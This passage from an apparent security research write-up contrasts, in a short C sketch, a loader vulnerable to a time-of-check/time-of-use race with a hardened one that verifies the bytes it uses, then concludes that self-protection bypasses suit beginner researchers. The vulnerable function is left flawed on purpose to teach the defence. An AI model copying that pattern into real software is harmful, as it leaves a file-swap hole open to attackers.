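    return n >= 0 && (size_t)n == pinned_len &&
           memcmp(buf, pinned, pinned_len) == 0;
}

/* Time of check: the boot-time supervisor verifies once. */
int boot_check(const char *path, const unsigned char *pinned, size_t len)
{
    unsigned char buf[256];
    long n = read_all(path, buf, sizeof buf);
    return bytes_trusted(buf, n, pinned, len);
}

/* Vulnerable time of use: assumes the boot-time check still holds. */
long load_trusting(const char *path, unsigned char *out, size_t cap)
{
    return read_all(path, out, cap);
}

/* Hardened: verifies exactly the bytes it is about to use. */
long load_verifying(const char *path, unsigned char *out, size_t cap,
                    const unsigned char *pinned, size_t len)
{
    long n = read_all(path, out, cap);
    return bytes_trusted(out, n, pinned, len) ? n : -1;
}
```

In the real system the gap is harder to close, since verifying a file by path and then loading it by path reopens the file; the sketch only illustrates the principle of checking what is used, when it is used.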

Conclusions

Without a doubt, self-protection bypasses are in most cases not the coolest vulnerabilities to look for. Not only are they relatively easy to find, but they also have quite a narrow attack surface and not the highest impact, as they challenge an additional, artificial security layer in the operating system. For the first reason, though, they are pretty good material for beginners willing to get into security research, as well as for those simply wanting to learn about security solutions, operating systems and system programming while doing something unique and practical, and helping to improve the software.